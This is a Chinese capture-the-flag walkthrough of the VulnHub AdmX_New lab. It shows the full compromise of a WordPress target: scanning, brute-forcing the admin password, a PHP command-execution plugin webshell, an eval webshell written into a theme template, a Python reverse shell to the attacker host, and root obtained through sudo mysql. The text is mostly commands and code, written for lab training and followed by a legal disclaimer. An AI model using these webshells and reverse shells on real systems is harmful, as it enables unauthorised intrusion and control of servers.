AdmX_New

admin 2024年4月16日08:11:57评论10 views字数 3687阅读12分17秒阅读模式

0x01 下载地址

https://download.vulnhub.com/admx/AdmX_new.7z

0x02 靶机目标

取得 2 个 flag + root 权限

0x03 工具准备

  • 密码字典:https://github.com/fuzz-security/SuperWordlist

  • 蚁剑Loader:https://github.com/AntSwordProject/AntSword-Loader

  • Python反弹shell:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.104",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

0x04 详细步骤

一、主机发现

sudo nmap -sn 10.0.0.0/24

AdmX_New

二、端口扫描

sudo nmap -p- 10.0.0.105
sudo nmap -p80 -sV 10.0.0.105

AdmX_New

AdmX_New

三、Web目录扫描

方法一:dirsearch

方法二:dirb

方法三:feroxbuster

sudo apt install feroxbuster -y#由于feroxbuster本身没有内建目录字典,需要调用seclists中的字典,所以这个也需要安装一下sudo apt install seclists -y
feroxbuster --url http://10.0.0.105

AdmX_New

经扫描发现的可用目录为http://10.0.0.105/wordpress/

浏览器访问http://10.0.0.105

AdmX_New

通过浏览访问http://10.0.0.105/wordpress发现该页面经过长时间的加载始终无法完成,所以需要通过Burp抓包分析网站加载过程。

四、Burp分析(Match&Replace)

通过Burp抓包分析发现,该站点加载过程中会向192.168.159.145申请加载JS资源,故造成站点加载速度慢

AdmX_New

为解决这个问题,在Burp做如下设置:响应头部和响应体中192.168.159.145替换成10.0.0.105

AdmX_New

再次刷新浏览器,页面加载正常

AdmX_New

但在前台页面并没发现更多的漏洞。

五、爆破管理员密码

再次返回查看目录扫描结果,访问http://10.0.0.105/wordpress/wp-admin,确认找到WordPress后台管理地址

AdmX_New

经测试,该登录入口不存在SQL注入(万能密码)漏洞,故采用暴力破解的方法

测试用户是否存在

输入正确的用户名时:提示密码错误

AdmX_New

输入不存在的用户名时:提示用户名不知道

AdmX_New

开始密码爆破

使用Burp截获提交登录密码的包

AdmX_New

发送到Intruder,只对密码进行破解

AdmX_New

设置Payload,加载MidPwds.txt密码字典

AdmX_New

经测试,密码为adam14

AdmX_New

登录管理员账户,查看后台管理页面,查看WordPress版本为5.7.1,主题为Twenty Twenty-One

AdmX_New

六、WordPress系统GetShell(3种方法)

WordPress可能存在GetShell点

  • Media->Add New->上传Shell

AdmX_New

  • Appearance->Edit Themes->404Template->直接写入一句话木马eavl($_POST['cmd']);

AdmX_New

  • Plugins->Add New->Upload Plugin->上传一个自己手写的插件

cat shell.php
<?php
/**
* Plugin Name: Webshell
* Plugin URI: https://yuanfh.github.io
* Description: WP Wehshell for Pentest
* Version: 1.0
* Author: yuanfh
* Author URI: https://yuanfh.github.io
* License: https://yuanfh.github.io
*/

if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
zip shell.zip shell.php

AdmX_New

AdmX_New

AdmX_New

访问一下上传的shell

http://10.0.0.105/wordpress/wp-content/plugins/shell.php?cmd=id

AdmX_New

已经实现系统命令执行

七、反弹Shell

kali主机监听5555端口

nc -lnvp 5555

AdmX_New

靶机上是否存在nc、python3

AdmX_New

AdmX_New

http://10.0.0.105/wordpress/wp-content/plugins/shell.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.0.0.104%22,5555));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27

反弹成功

AdmX_New

使用MSF反弹Shell(功能不完整)

启动MSF

msfconsole

AdmX_New

search wordpress admin

AdmX_New

use 2

AdmX_New

show options

AdmX_New

set PASSWORD adam14
set RHOSTS 10.0.0.105
set TARGETURI /wordpress
set USERNAME admin
run

AdmX_New

AdmX_New

但这个Shell功能并不完整如pwd,ls等命令都没有回显,所以依然选择使用Python3反弹的Shell

AdmX_New

使用Python3反弹Shell

在404模板页面写入一句话木马

cd wp-content/themes/twentytwentyone

AdmX_New

vi 404.php

但功能依然有缺陷,vi编辑器无法显示

AdmX_New

升级Shell功能(只适用于Bash)

  1. 切换Kali默认SHELL为Bash

chsh -s /bin/bash
reboot

AdmX_New

AdmX_New

待系统重启完成后

AdmX_New

  1. 按照之前步骤重新使用Python3获取系统WebShell(过程略)

AdmX_New

  1. 按下键盘Ctrl+z

AdmX_New

  1. stty raw -echo

  2. fg

  3. 系列命令

ls
export SHELL=/bin/bash
export TERM=screen
stty rows 38 columns 116
reset

再次编辑404.php模板

cd wp-content/themes/twentytwentyone
vi 404.php

可以正常使用

AdmX_New

八、使用蚁剑连接Shell

连接地址:

http://10.0.0.105/wordpress/wp-content/themes/twentytwentyone/404.php

设置蚁剑参数

AdmX_New

AdmX_New

成功连接

AdmX_New

关于Shell的建议

Tip:一般系统的Shell都较难获取,一但获取某个Shell权限后,建议多种方式,多挣途径,多准备几个Shell,以防Shell权限丢失。

九、系统提权

前期通过系统信息收集该系统存在wpadmin账户,内核版本5.4无法提权

通过WordPress配置文件找到了数据库配置文件,找到数据库连接密码

AdmX_New

连接数据库用户名admin、密码:Wp_Admin#123

尝试切换wpadmin,并使用adam14密码登录

su wpadmin

登录成功

AdmX_New

在wpadmin获取第一个flag

cd ~
cat local.txt

AdmX_New

查询用户权限:

sudo -l

该用户不需要密码 sudo mysqlAdmX_New

sudo /usr/bin/mysql -u root -D wordpress -p

输入密码adam14

成功登录数据库

AdmX_New

十、Mysql提权

system id

AdmX_New

system /bin/bash

AdmX_New

cd ~
cat proot.txt

AdmX_New

AdmX_New

本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!

敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。

原文始发于微信公众号(巢安实验室):AdmX_New

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月16日08:11:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   AdmX_Newhttps://cn-sec.com/archives/2661621.html

发表评论

匿名网友 填写信息